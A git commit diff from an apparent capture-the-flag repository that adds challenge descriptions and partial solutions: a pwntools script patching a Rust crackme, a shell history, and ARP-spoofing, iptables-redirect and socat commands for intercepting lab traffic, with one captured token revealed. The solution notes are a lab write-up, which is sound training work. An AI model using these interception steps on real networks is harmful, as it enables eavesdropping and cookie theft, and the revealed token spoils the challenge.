Commit 22774ff
Changed files (41)
2026-01-11-PC07-Individual-R1
2026-01-23-PC07-Team-R1
arcadian
arecibo
bacdoor-access
loud-and-clear
monkey-in-the-middle
purple-road
2026-01-11-PC07/bank-on-it/README.md → 2026-01-11-PC07-Individual-R1/bank-on-it/README.md
File renamed without changes
2026-01-11-PC07/bank-on-it/TOKEN1.md → 2026-01-11-PC07-Individual-R1/bank-on-it/TOKEN1.md
File renamed without changes
2026-01-11-PC07/bank-on-it/TOKEN2.md → 2026-01-11-PC07-Individual-R1/bank-on-it/TOKEN2.md
File renamed without changes
2026-01-11-PC07/bank-on-it/TOKEN3.md → 2026-01-11-PC07-Individual-R1/bank-on-it/TOKEN3.md
File renamed without changes
2026-01-11-PC07/bank-on-it/TOKEN4.md → 2026-01-11-PC07-Individual-R1/bank-on-it/TOKEN4.md
File renamed without changes
2026-01-11-PC07/bank-on-it/TOKEN5.md → 2026-01-11-PC07-Individual-R1/bank-on-it/TOKEN5.md
File renamed without changes
2026-01-11-PC07/blind-trust/README.md → 2026-01-11-PC07-Individual-R1/blind-trust/README.md
File renamed without changes
2026-01-11-PC07/blind-trust/TOKEN1.md → 2026-01-11-PC07-Individual-R1/blind-trust/TOKEN1.md
File renamed without changes
2026-01-11-PC07/blind-trust/TOKEN2.md → 2026-01-11-PC07-Individual-R1/blind-trust/TOKEN2.md
File renamed without changes
2026-01-11-PC07/blind-trust/TOKEN3.md → 2026-01-11-PC07-Individual-R1/blind-trust/TOKEN3.md
File renamed without changes
2026-01-11-PC07/blind-trust/TOKEN4.md → 2026-01-11-PC07-Individual-R1/blind-trust/TOKEN4.md
File renamed without changes
2026-01-11-PC07/code-osiris/README.md → 2026-01-11-PC07-Individual-R1/code-osiris/README.md
File renamed without changes
2026-01-11-PC07/code-osiris/TOKEN1.md → 2026-01-11-PC07-Individual-R1/code-osiris/TOKEN1.md
File renamed without changes
2026-01-11-PC07/code-osiris/TOKEN2.md → 2026-01-11-PC07-Individual-R1/code-osiris/TOKEN2.md
File renamed without changes
2026-01-11-PC07/code-osiris/TOKEN3.md → 2026-01-11-PC07-Individual-R1/code-osiris/TOKEN3.md
File renamed without changes
2026-01-11-PC07/code-osiris/TOKEN4.md → 2026-01-11-PC07-Individual-R1/code-osiris/TOKEN4.md
File renamed without changes
2026-01-11-PC07/the-iron-shell/README.md → 2026-01-11-PC07-Individual-R1/the-iron-shell/README.md
File renamed without changes
2026-01-11-PC07/the-iron-shell/TOKEN1.md → 2026-01-11-PC07-Individual-R1/the-iron-shell/TOKEN1.md
File renamed without changes
2026-01-11-PC07/the-iron-shell/TOKEN2.md → 2026-01-11-PC07-Individual-R1/the-iron-shell/TOKEN2.md
File renamed without changes
2026-01-11-PC07/the-iron-shell/TOKEN3.md → 2026-01-11-PC07-Individual-R1/the-iron-shell/TOKEN3.md
File renamed without changes
2026-01-11-PC07/the-iron-shell/TOKEN4.md → 2026-01-11-PC07-Individual-R1/the-iron-shell/TOKEN4.md
File renamed without changes
2026-01-11-PC07/AGENTS.md → 2026-01-11-PC07-Individual-R1/AGENTS.md
File renamed without changes
2026-01-23-PC07-Team-R1/arcadian/arcadian
Binary file
2026-01-23-PC07-Team-R1/arcadian/README.md
@@ -0,0 +1,93 @@
+Arcadian
+
+? Embrace your love of rustic art by reverse-engineering a new digital exhibit at the Palace of Versailles, built with the Rust programming language.
+
+NICE Work Roles
+
+ Vulnerability Analysis
+ Software Security Assessment
+
+NICE Tasks
+
+ T1118: Identify vulnerabilities
+ T1496: Develop reverse engineering tools
+ T1590: Identify programming flaws
+
+Background
+
+? As an art and history enthusiast, you encounter a new digital exhibition while touring the Palace of Heracles. Before you can ask about the mysterious laptop on the podium, your tour guide explains that only those with a taste for Arcadian (rustic) art are 'chosen' to complete the challenge. You are then guided to the laptop and the rest of the tour attendees patiently watch you engage in this one-of-a-kind experience.
+
+In this challenge, you must reverse a Rust binary, discover its hidden tokens, and earn the adoration of the greater art community.
+Getting Started
+
+Downloading The Exhibit To get started, simply navigate to the Arcadian website and download the binary to your preferred operating system to begin the journey.
+
+Permissions Issues If you get an Access Denied message when executing the binary, simply run the following command to activate it: chmod +x arcadian
+
+Tokens
+Initially, you will find the binary does not readily provide tokens for successful actions:
+
+e.g. ✅ TOKEN1: <VALUE>
+
+This is intended by the artist.
+
+You must use your knowledge of reverse engineering functions to extract tokens from the binary in a creative way.
+
+Stages/Acts
+Any team member can jump directly to a specific stage by running the binary with the following command:
+
+./arcadian --stage [1,2,3,4,5]
+
+This will take you directly to a specific stage at any time.
+
+XOR-Shift Algorithm An XOR-Shift in this context is defined as incrementing the position of a byte by one. Please view the example below for clarity:
+
+Base XOR Key: 0xA1
+Word: APPLE
+
+A would be XOR'd with 0xA1
+P would be XOR'd with 0xA2
+P would be XOR'd with 0xA3
+L would be XOR'd with 0xA4
+E would be XOR'd with 0xA5
+
+Objectives
+
+ Find the fragmented token
+ Complete the Dynamic Pointer Maze via automation or reverse-engineering.
+ Capture the memory of the binary (in a timely manner)
+ Examine the misconfigured logic behind an application error.
+ Decrypt ciphertext using an XOR-shift algorithm
+
+System and Tool Credentials
+system/tool location
+Art Exhibit http://exhibit.pccc
+Note
+
+Only the binary downloaded from the exhibit is in-scope for this engagement. The web page and underlying infrastructure is out of scope.
+Token 1 - Act I
+955 points
+
+Repair the fragmented string in stage 1
+Unanswered3 attempts left
+Token 2 - Act II
+955 points
+
+Discovered after completing the DPM (Maze)
+Unanswered3 attempts left
+Token 3 - Act III
+955 points
+
+Use SIGTRAP to retrieve this token from memory during it's decryption routine.
+Unanswered3 attempts left
+Token 4 - Act IV
+955 points
+
+Find the STAGE4_UNLOCK symbol, determine it's offset, and patch it with a '\x00' to produce this token.
+Unanswered3 attempts left
+Token 5 - The Final Act
+1500 points
+
+Decrypt the ciphertext from stage 5 using an XOR-shift algorithm
+Unanswered3 attempts left
+
2026-01-23-PC07-Team-R1/arcadian/solution.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python3
+import itertools
+import signal
+from time import sleep
+from pwn import *
+
+class Exploit:
+ def __init__(self, filename: str):
+ self.filename = filename
+ self.patched = "arcadian_patched"
+ self.elf = ELF(self.filename)
+ self.p = process(self.elf.path)
+
+ def get_flag(self, token: bytes) -> None:
+ self.p.recvuntil(token)
+ flag = self.p.recvuntil(b"}").decode('utf-8')
+ log.success(f"{token.decode('utf-8')} = {flag}")
+
+ def stage1(self) -> None:
+ addr = 0x9d28 # patch off the first check to get first flag
+ self.elf.write(addr, b"\x30\xc0") # xor al,al to pass the test
+ self.elf.save(self.patched)
+ self.elf = ELF(self.patched)
+ self.p = process(self.elf.path)
+ self.p.sendline(b"lol lol lol lol")
+ self.get_flag(b"TOKEN1: ")
+
+ def stage2(self) -> None:
+ # I brute forced this solution with another program
+ stage2_solution = b"L R U D L X"
+ self.p.recvuntil(b"Enter your 6 moves: >")
+ self.p.sendline(stage2_solution)
+ self.get_flag(b"TOKEN2: ")
+ # Need this for stage3
+ gdb.attach(self.p, gdbscript='continue')
+
+ def stage3(self) -> None:
+ self.p.recvuntil(b"Decrypting TOKEN3 in 5 seconds")
+ sleep(5)
+ self.p.send_signal(signal.SIGTRAP)
+ log.info("Hit continue on gdb twice!")
+ self.p.sendline(b"dump")
+ self.get_flag(b"TOKEN3: ")
+
+ def stage4(self) -> None:
+ self.elf = ELF(self.patched)
+ stage4_lock_offset = self.elf.sym['STAGE4_LOCK'] # Be 31337 and just use pwnt00ls
+ self.elf.write(stage4_lock_offset, b"\x00")
+ self.elf.save(self.patched)
+ self.elf = ELF(self.patched)
+ self.p = process([self.elf.path, '--stage', '4'])
+ self.p.send(b'\n')
+ self.get_flag(b"TOKEN4: ")
+
+ def stage5(self) -> None:
+ # The most meme stage of them all lmao easiest one
+ cipher = [0xF5,0xE5,0xE4,0xEB,0xD2,0xEB,0xF9,0xEF,0x80,0xDC,0x99,0xD5,0x80,0x84,0x81,0xC9]
+ base_key = 0xa5
+ results = ""
+ for c in cipher:
+ results += chr(c ^ base_key)
+ base_key += 1
+ log.success(f"FLAG = {results}")
+ self.p = process([self.elf.path, '--stage', '5'])
+ self.p.sendline(results.encode('utf-8'))
+ self.p.interactive()
+
+if __name__ == "__main__":
+ e = Exploit("./arcadian")
+ e.stage1()
+ e.stage2()
+ e.stage3()
+ e.stage4()
+ e.stage5()
2026-01-23-PC07-Team-R1/arecibo/README.md
@@ -0,0 +1,82 @@
+Arecibo
+
+As an uncover operative, hijack a satellite's command-and-control interface using MQTT exploits. The end goal is to configure an "observatory" to fire its hidden orbital laser.
+
+NICE Work Roles
+
+ Vulnerability Analysis
+ Exploitation Analysis
+
+NICE Tasks
+
+ T1091: Conduct and/or support authorized penetration testing on enterprise network assets.
+ T1118: Identify vulnerabilities
+
+Background
+
+? Word on the street is that the Arecibo Observatory houses a powerful syndicate planning to destabilize the financial systems of neighboring countries and islands using an Electromagnetic Pulse (EMP). As an undercover operative, your mission is to exploit the Arecibo satellite, which is being targeted for malicious purposes. This engagement is the final test of your loyalty to join their ranks. Blue Team members must ensure the mission fails by implementing appropriate remediation. If done correctly, the adversary will attribute the failure to effective countermeasures.
+Objectives
+
+In this challenge, you will:
+
+ Learn the MQTT protocol to interact with an active orbital laser.
+ Create scripts and automation to determine the correct angle, coordinates, and verification code.
+ Convert the once-marveled observatory into a weapon.
+
+Getting Started
+
+For this challenge, tokens are awarded for acquiring each necessary data value needed to fire the laser. Challengers must find:
+
+ The correct angle to hit the target
+ The target's coordinates
+ The verification key (HMAC)
+ The ability to change the mode of the observatory into attack mode
+
+Dashboard You will be provided a live dashboard where you can review additional information and track your status in this operation. This dashboard is called the "ARECIBO UPLINK PANEL" and is crucial to your success in this engagement.
+
+The panel can be found at http://satellite.obs:5000.
+
+MQTT Pub/Sub The satellite uses the Message Queuing Telemetry Transport (MQTT) protocol to send and receive commands. The protocol is also used to provide up-to-date status on its operations.
+
+Pub/Sub communication tools will be extremely useful in this challenge.
+Submissions
+
+IMPORTANT: Tokens received are only presented to challengers once. As this is a covert operation, our actions must be calculated to avoid detection by the custodians of the observatory.
+System and Tool Credentials
+system/tool location
+arecibo mqtt-broker.obs:1883
+Uplink Panel (Dashboard) satellite.obs:5000
+Note
+
+Attacking or attempting to gain unauthorized access to challenge platform is forbidden.
+Token 1 - Sub-A-Thon
+325 points
+
+Learn how to configure the observatory by interacting with the satellite/core/control topic.
+Unanswered3 attempts left
+Token 2 - Attack Mode
+486 points
+
+Configure the observatory to go into attack mode using the correct topic - e.g. satellite/core/
+Unanswered3 attempts left
+Token 3 - Angular
+1094 points
+
+Configure the correct angle to reach the target via satellite/core/control (Range 0.0-180.0)
+Unanswered3 attempts left
+Token 4 - Return of the HMAC
+325 points
+
+Obtain the key and submit it for HMAC verification by observing all available topics
+Unanswered3 attempts left
+Token 5 - Coordinated Effort
+910 points
+
+Determine the correct angle needed to hit the target using the "dump_coords" command via satellite/core/control
+Unanswered3 attempts left
+Token 6 - Firing The Laser
+100 points
+
+📡 Fire the laser beam and complete your mission
+Unanswered3 attempts left
+
2026-01-23-PC07-Team-R1/bacdoor-access/README.md
@@ -0,0 +1,78 @@
+BACDoor Access
+
+Hunched over your laptop in a cramped and dirty maintenance room, you've obtained access to a university's building automation system. Using BACnet, exploit this access to break into a secure research lab and steal sensitive research documents.
+
+NICE Work Roles
+
+ Vulnerability Analysis
+ Exploitation Analysis
+
+NICE Tasks
+
+ T1359: Perform penetration testing.
+ T1635: Access targeted networks.
+ T1118: Identify vulnerabilities.
+
+Background
+
+An engineering professor at Some State University (SSU) has decided to keep their vulnerability research private, and your spy organization could desperately use those new techniques. You've been tasked with breaking into the engineering lab at SSU and retrieving any and all documents related to the research. Traveling to SSU, you've located the lab and server on the third floor of the engineering building, but both doors are locked. Hearing someone about to leave the lab, you tuck yourself into a nearby maintenance closet.
+
+Peeking out the door, you see a student leaving the lab, with someone in the lab angrily yelling "The class is in the lecture hall. Give the intro lecture on BACnet, and we will continue discussing your poor password habits afterward." Looking around, the closet contains an exposed Ethernet port; connecting, you realize this gives you access to the building automated control system! Use this to get the professor out of the lab, unlock both doors, and escape with the research.
+Getting Started
+
+On the provided Kali machine, you have access to the network exposed in the engineering building maintenance room. You can also reach http://ssu.edu, the SSU homepage, on the campus-wide network.
+
+Note that the SCADA dashboard can take 5+ minutes to launch, import, and ensure all BACnet devices have launched and been configured. If you reset your challenge after completing Token 2 and immediately log in, the dashboard may be blank; log out, wait a minute for the import, and then log back in.
+Tokens
+
+The tokens are formatted as PCCC{some_words_here}.
+
+Tokens 1-3 are sequential; the other tokens may be completed in any order, although completing tokens 1-3 first may make them easier.
+
+Tokens 1, 3, 5, and 6 require a grading check. Visit http://challenge.pccc to perform the grading check. For Token 1, enter the username into the available text box before hitting Grade. For the other tokens, you may leave the text box empty.
+
+ Token 1: Investigate http://ssu.edu and find the username of the graduate student who was just getting scolded.
+ Submit the username to the grading server.
+ Token 2: Find the SCADA control dashboard and log in as the graduate student. The token is displayed on the HMI in the maintenance room you are hiding in.
+ Token 3: Get the professor to leave the lab by causing chaos; disable all the lights in the main lecture room.
+ Token 4: Find a token hidden in one of the BACnet devices in the engineering building.
+ Token 5: You need to grab any physical documents from the lab. Use the BACnet access to unlock the lab door.
+ Token 6: The server room is much more secure. Use BACnet to get into the server room by tampering with the fire and server room devices.
+ Be careful not to start a fire drill! You don't need that kind of heat.
+
+System and Tool Credentials
+system/tool username password
+kali-vnc user password
+Note
+
+Attacking or unauthorized access to challenge.pccc is forbidden. You may only use the provided web page to view challenge progress and download any challenge artifacts that are provided.
+Question 1
+226 points
+
+Enter the token received from challenge.pccc after identifying the correct username.
+Unanswered3 attempts left
+Question 2
+453 points
+
+Enter the token found on the SCADA Dashboard.
+Unanswered3 attempts left
+Question 3
+906 points
+
+Enter the token received from challenge.pccc after disabling the lecture hall lights.
+Unanswered3 attempts left
+Question 4
+1132 points
+
+Enter the token found on one of the BACnet devices in the engineering building.
+Unanswered3 attempts left
+Question 5
+679 points
+
+Enter the token received from challenge.pccc after unlocking the lab door.
+Unanswered3 attempts left
+Question 6
+1132 points
+
+Enter the token received from challenge.pccc after gaining access to the server room.
+Unanswered3 attempts left
2026-01-23-PC07-Team-R1/loud-and-clear/README.md
@@ -0,0 +1,81 @@
+Loud and Clear
+
+Lancer’s staging mail gateway is stuck on a legacy stack. Validate each patch level by proving whether the gateway can still be coerced into leaking protected data using your offensive security toolkit.
+
+NICE Work Roles
+
+ Cyber Defense Analyst
+ Exploitation Analyst
+
+NICE Tasks
+
+ T0028: Conduct and/or support authorized penetration testing on enterprise network assets.
+ T0566: Analyze internal operational architecture, tools, and procedures for ways to improve performance.
+
+Background
+
+? Lancer Corporation relies on an outdated Commercial Off-The-Shelf (COTS) hardware solution that integrates an open-source, legacy mail service. However, their sales vendor has explicitly stated that this mail system is incompatible with modern architectures.
+
+Due to high availability demands and limited options for replacement, Lancer’s engineering team has attempted to develop an in-house version of the service (based on the original open-source code) to maintain operations.
+
+The Network Security Team (NST) has placed tokens in four separate development environments for you to retrieve to prove or disprove the effectiveness of their hot patches.
+Objectives
+
+For each patch level:
+
+ Set the patch level using the console.
+ Interact with SMTP and exploit the detected vulnerability.
+ Extract the token and submit it.
+
+Getting Started
+
+For this engagement, two service endpoints exist:
+
+ An SMTP service: staging.lancer.pccc:2525
+ A patch control console: staging.lancer.pccc:31337
+
+The console can switch between four patch levels. Each subsequent level hosts a patch with lessons learned from the previous patch. Unfortunately, unbeknownst to the NST, each level still contains a bypass. Each patch level introduces incremental changes to how user-supplied input is sanitized and processed by the mail service.
+Tokens
+
+Tokens will take this form:
+
+PCCC{VALUE-VALUE-VALUE}
+
+Token Location
+
+? IMPORTANT: The location of the token for each patch level is /opt/lancer/tokens/ and are titled token#.txt. For example, the location of the first token for this engagement is /opt/lancer/tokens/token1.txt
+Rules of Engagement and other notes
+
+? IMPORTANT: The NST has enabled a custom header (X-Lancer-QA) that is processed by downstream mail-handling logic. All test payloads should be delivered using this header to ensure proper inspection. Additionally, all emails should be sent from tester@demo.local.
+
+Unfortunately, the team has left on vacation and forgot to tell you which email address to send to in order to reach the right instance of the virtualized patch instances. Mail-handling rules determine whether user-supplied input is fully processed. Only one sender address will trigger the vulnerable execution path. A list of all current email addresses can be found in the Patch Control Console by calling the "LIST" command.
+System and Tool Credentials
+system/tool location port
+SMTP Service staging.lancer.pccc tcp/2525
+Patch Console staging.lancer.pccc tcp/31337
+Note
+
+Attacking or attempting to gain unauthorized access to Challenge Platform is forbidden. You do not need root access to the server to complete this challenge.
+
+Tokens are awarded through completion of the objectives.
+Token 1 — Patch 1.0 Validation
+600 points
+
+Switch the console to Patch 1 and extract TOKEN1.
+Unanswered3 attempts left
+Token 2 — Patch 2.0 Validation
+750 points
+
+Switch the console to Patch 2 and extract TOKEN2.
+Unanswered3 attempts left
+Token 3 — Patch 3.0 Validation
+800 points
+
+Switch the console to Patch 3 and extract TOKEN3.
+Unanswered3 attempts left
+Token 4 — Patch 4.0 Validation
+1090 points
+
+Switch the console to Patch 4 and extract TOKEN4.
+Unanswered3 attempts left
+
2026-01-23-PC07-Team-R1/monkey-in-the-middle/.govnc_history
@@ -0,0 +1,166 @@
+nmap -sn 10.0.91.128/26
+nmap -sn 10.0.91.128/26 | xclip -i
+xclip -o
+xclip -o > mitm.sh
+sudo bash mitm.sh
+toor
+password
+tee mitm.out
+xclip -i mitm.out
+xclip -o > mitm_math.sh
+sudo bash mitm_math.sh | tee math.out
+xclip -o > math_proxy.py
+sudo bash mitm_math.sh | tee math.out
+ls
+cat math_proxy.py
+xclip -o > math_proxy.py
+xclip -o > math_proxy.py
+
+xclip -o > math_proxy.py
+sudo bash mitm_math.sh | tee math.out
+xclip -i arcadian.b64.saa
+sha256 arcadian.b64.saa
+xclip -i arcadian.b64.saa
+xclip -i arcadian.b64.sab
+xclip -i arcadian.b64.sac
+xclip -i arcadian.b64.sad
+xclip -i arcadian.b64.sae
+xclip -i arcadian.b64.saf
+xclip -i arcadian.b64.sag
+xclip -i arcadian.b64.sah
+xclip -i arcadian.b64.sai
+xclip -i arcadian.b64.saj
+xclip -o > clip.sh
+cat clip.sh
+bash clip.sh
+ls *.s*
+sha256sum *.b64.s*
+sha256sum *.b64.s* | xclip -i
+xclip -i arcadian.b64.scu
+
+xclip -o > math_proxy.py
+
+password
+xclip -o > dns.sh
+xclip -o > dns2.sh
+xclip -o > dns.py
+sudo python3 dns.py | tee dns3.out
+xclip -o > dns.py
+sudo python3 dns.py | tee dns3.out
+xclip -o > http.py
+sudo python3 http.py | tee http.out
+xclip -o > http.py
+sudo python3 http.py | tee http.out
+xclip -i http.out
+xclip -o > http.py
+sudo python3 http.py | tee http.out
+xclip -o > http.py
+sudo python3 http.py | tee http.out
+xclip -o > cookie.py
+sudo python3 cookie.py | cookie.out
+sudo python3 cookie.py | tee cookie.out
+xclip -o > cookie.py
+sudo python3 cookie.py | tee cookie.out
+xclip -o > math.py
+sudo math.py | tee math.out
+password
+sudo python3 math.py | tee math.out
+xclip -i math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+xclip -o > math.py
+sudo python3 math.py | tee math.out
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+xclip -o > math.py
+python3 math.py | tee math.out
+xclip -o > math.py
+python3 math.py | tee math.out
+xclip -o > math.py
+python3 math.py | tee math.out
+xclip -o > math.go
+xclip -o > math.py
+xclip -o > math.go
+go run main.go
+xclip -o > math.go
+file main.go
+ls -al
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math_take_2.go
+xclip -o > math_v3.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > math.go
+go run math.go
+xclip -o > test.py
+xclip -o > math.go
+xclip -o > test.py
+go run math.go
+xclip -o > test.py
+go run math.go
+ls
2026-01-23-PC07-Team-R1/monkey-in-the-middle/mitm_setup.md
@@ -0,0 +1,61 @@
+# MITM Proxy Setup
+
+## Prerequisites
+- Root access
+- `arpspoof` installed (dsniff package)
+
+## Setup Commands
+
+### 1. Enable IP forwarding
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+### 2. Start ARP spoofing (two terminals or background)
+```bash
+arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
+arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &
+```
+
+### 3. Redirect traffic to proxy
+```bash
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+```
+
+**Why iptables is needed:** ARP spoofing makes traffic flow through our machine, but packets are still addressed to `10.0.91.130:9000`. Without iptables, our kernel would just forward them onward. The REDIRECT rule intercepts packets before routing and rewrites the destination to `localhost:9000`, delivering them to our proxy instead.
+
+### 4. Run proxy
+
+**Option A: socat (minimal, no logging)**
+```bash
+socat TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000
+```
+
+**Option B: socat with hex dump**
+```bash
+socat -x -v TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000
+```
+
+**Option C: Python script (with JSONL logging)**
+```bash
+python3 math_solve.py
+```
+
+## Cleanup Commands
+
+### Stop ARP spoofing
+```bash
+pkill arpspoof
+```
+
+### Remove iptables rule
+```bash
+iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+```
+
+## Network Info
+| Host | IP |
+|------|-----|
+| mathclient | 10.0.91.132 |
+| mathserver | 10.0.91.130 |
+| Port | 9000 |
2026-01-23-PC07-Team-R1/monkey-in-the-middle/README.md
@@ -0,0 +1,95 @@
+Monkey in the Middle
+
+While attending your annual spy training, you made an offhand comment about loving the game "Monkey in the Middle" as a child. Prove you're still at the top of your game by using multiple spoofing techniques to eavesdrop, tamper, and steal a secure browser cookie.
+
+NICE Work Roles
+
+ Vulnerability Analysis
+ Exploitation Analysis
+
+NICE Tasks
+
+ T1359: Perform penetration testing
+ T1118: Identify vulnerabilities
+ T0591: Perform analysis for target infrastructure exploitation activities
+
+Background
+
+While enjoying a short lunch break at the mandatory annual spy training, you make an offhand comment about loving the game "Monkey in the Middle" as a child. The instructor makes a weird face and runs from the room, cackling like a maniac and muttering "MitM". The next day, you find the lesson plan has been replaced with a hands-on workshop all about spoofing, intercepting, and tampering with communication on a local network! The instructor challenges you to prove you're still a champion at "Monkey in the Middle" by stealing a SameSite: Strict cookie from his browser.
+Getting Started
+
+Use the provided Kali machine to access the workshop's network. The instructor reminds you that forwarding is enabled by default on the device. The instructor also tells you that there are six other hosts on the network:
+
+ mathserver.pccc, running a custom TCP server on port 9000
+ mathclient.pccc, opens a connection to mathserver.pccc
+ dnsmasq.pccc, provides DNS via dnsmasq
+ dnsvictim.pccc, uses the DNS service from dnsmasq.pccc
+ web.pccc, hosts a simple web server
+ webvictim.pccc, which uses Selenium to browse web.pccc
+
+Tokens
+
+The instructor provides a list of tokens to retrieve from these devices. The tokens are formatted as PCCC{some_words_here_??_????}. Token 3 uses the alternative format PCCC-some-words-here-??-???? to be a valid domain name.
+
+Note the following tokens may be collected in any order, although they are designed to naturally lead up to the final task.
+
+No grading is required.
+
+ Intercept the token sent by mathclient.pccc to mathserver.pccc on port 9000.
+ The mathserver.pccc will send this token when all of the math questions passed between mathclient.pccc and mathserver.pccc are answered correctly.
+ Intercept the DNS request from dnsvictim.pccc and find this token in the first label of the domain name.
+ This token uses the alternative format PCCC-some-words-here-??-???? to be a valid domain name.
+ After a successful DNS lookup, the dnsvictim.pccc host tries to send this token to port 9001 at {token3}.target.pccc
+ This token is in the header of the HTTP request sent by webvictim.pccc.
+ The webvictim.pccc host types this token into the textarea on the page retrieved from web.pccc.
+ Combine all of these skills to steal a cookie from the webvictim.pccc host.
+ The cookie is named tokenLax, and belongs to the domain external.target.pccc on port 80.
+ This cookie is marked as SameSite: Lax.
+ Combine all of these skills to steal a cookie from the webvictim.pccc host.
+ The cookie is named tokenStrict, and belongs to the domain external.target.pccc on port 80.
+ This cookie is marked as SameSite: Strict.
+
+System and Tool Credentials
+system/tool username password
+kali-vnc user password
+Question 1
+230 points
+
+Enter the token received from intercepting the communication between mathclient.pccc and mathserver.pccc.
+Unanswered3 attempts left
+Question 2
+460 points
+
+Enter the token received from mathserver.pccc after answering all the math questions correctly.
+Unanswered3 attempts left
+Question 3
+230 points
+
+Enter the token found in the DNS request sent by dnsvictim.pccc.
+Unanswered3 attempts left
+Question 4
+460 points
+
+Enter the token dnsvictim.pccc sends to {token3}.target.pccc.
+Unanswered3 attempts left
+Question 5
+460 points
+
+Enter the token in the header of the HTTP request from webvictim.pccc.
+Unanswered3 attempts left
+Question 6
+690 points
+
+Enter the token webvictim.pccc tries to type into the textarea of web.pccc.
+Unanswered3 attempts left
+Question 7
+920 points
+
+Enter the token found inside the tokenLax cookie.
+Unanswered3 attempts left
+Question 8
+1150 points
+
+Enter the token found inside the tokenStrict cookie.
+Unanswered3 attempts left
+
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_1.md
@@ -0,0 +1,50 @@
+# Token 1: Eavesdrop Token
+
+**Token:** `PCCC{Ugh_Math_Homework_32_42fb}`
+
+## Objective
+Intercept the token sent by mathclient.pccc to mathserver.pccc on port 9000.
+
+## Hosts
+- mathclient.pccc: 10.0.91.132
+- mathserver.pccc: 10.0.91.130
+
+## Method: ARP Spoofing + Passive Capture
+
+### Step 1: Enable IP forwarding
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+### Step 2: ARP spoof both directions
+```bash
+arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
+arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &
+```
+
+### Step 3: Capture traffic
+Option A - tcpdump:
+```bash
+tcpdump -i eth1 -A host 10.0.91.132 and port 9000
+```
+
+Option B - socat transparent proxy:
+```bash
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+socat -v TCP-LISTEN:9000,fork,reuseaddr TCP:10.0.91.130:9000
+```
+
+### Step 4: Wait for connection
+The mathclient connects periodically. The first message it sends is:
+```
+Eavesdrop Token: PCCC{Ugh_Math_Homework_32_42fb}
+```
+
+## Why It Works
+ARP spoofing tells both hosts that your MAC address belongs to the other host's IP. Traffic flows through your machine, and with IP forwarding enabled, it gets relayed transparently. You can passively observe or actively intercept.
+
+## Cleanup
+```bash
+pkill arpspoof
+iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_2.md
@@ -0,0 +1,83 @@
+# Token 2: Math Server Token
+
+**Token:** `[NOT YET CAPTURED]`
+
+## Objective
+The mathserver.pccc sends this token when all math questions passed between mathclient and mathserver are answered correctly.
+
+## Hosts
+- mathclient.pccc: 10.0.91.132
+- mathserver.pccc: 10.0.91.130
+- Port: 9000
+
+## Protocol Analysis
+
+### Message Format
+```
+<sha256_hash>,<unix_timestamp_ms>,<A> <op> <B> is <Z>
+```
+
+Example:
+```
+5a69c024434a1e42a450e0a39c218b94663ae8c21d6633f23f59b868c9ad27ec,1769191792514,3965 + 5689 is 798
+```
+
+### Protocol Flow (observed)
+1. Client sends: `Eavesdrop Token: PCCC{...}`
+2. Server sends: Question (with intentionally wrong math)
+3. Client evaluates math, sends `INCORRECT`, closes connection
+
+### Key Observations
+- Server ALWAYS sends wrong math in questions
+- Client responds `INCORRECT` and disconnects
+- Hash protects message integrity (can't modify equation without breaking hash)
+- Hash algorithm unknown (not simple SHA256 of message)
+- Protocol is **bidirectional** - client also sends questions to server with valid hashes
+
+### Approaches Tried
+
+**1. Answer INCORRECT (correct evaluation)**
+- Result: Server echoes INCORRECT and closes
+
+**2. Answer CORRECT (lie about wrong math)**
+- Result: Server rejects
+
+**3. Reflect server's question back**
+- Result: Server rejects (probably checks for duplicates)
+
+**4. Fix equations, keep hash**
+- Result: Client accepts for a few rounds, but eventually fails
+- Hash mismatch detected somewhere
+
+**5. Spoof correct math to client (keep server's hash)**
+- Theory: If client doesn't verify hash, it will respond with its own valid question
+- Status: Untested
+
+### Current Best Approach
